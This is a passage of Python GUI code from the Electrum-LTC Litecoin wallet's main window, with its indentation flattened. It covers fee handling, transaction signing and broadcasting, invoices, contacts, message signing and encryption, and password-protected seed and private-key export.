# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
displayed_feerate = displayed_feerate // 1000 if displayed_feerate else 0
displayed_fee = displayed_feerate * size
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = displayed_fee // size if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
if feerounding:
self.feerounding_icon.setToolTip(
_('additional {} satoshis will be added').format(feerounding))
self.feerounding_icon.setVisible(True)
else:
self.feerounding_icon.setVisible(False)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
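        # Usage elsewhere in this class: decorate a method with @protected and give it a
        # 'password' keyword argument; callers invoke it without a password and this
        # wrapper prompts for it (e.g. show_seed_dialog, do_sign, export_privkeys_dialog).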
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
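    # The estimator returned below is handed to wallet.make_unsigned_transaction()
    # as fixed_fee: an int is treated as a fixed absolute fee, a callable as a
    # function of the estimated tx size, and None lets the wallet fall back to
    # the config's fee policy.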
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.') % alias + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Litecoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Litecoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
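        # relayfee() is expressed in satoshis per kilobyte, so scale by the tx size
        # in bytes to get the minimum fee the network will relay.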
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
            # external keypairs (set when sweeping) can sign directly, without the wallet password
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
        # Capture the current top-level window; the window override might be gone by the time the callback runs
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid litecoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.get_list_header())
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
if xtype in ['p2wpkh', 'p2wsh', 'p2wpkh-p2sh', 'p2wsh-p2sh']:
vbox.addWidget(WWLabel(_("Warning: the format of private keys associated to segwit addresses may not be compatible with other wallets")))
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_ltc.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_ltc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
        # if the user scanned a litecoin URI
if str(data).startswith("litecoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
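        # Electrum encodes raw transactions in base43 for QR codes (denser than hex
        # in alphanumeric QR mode), so decode that first.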
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
from electrum_ltc.transaction import SerializationError
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self):
from electrum_ltc.transaction import SerializationError
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self):
from electrum_ltc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                              _('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-ltc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
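        # The keys are derived in a background thread; progress updates and completion
        # are marshalled back to the GUI thread via the two Qt signals connected below.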
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
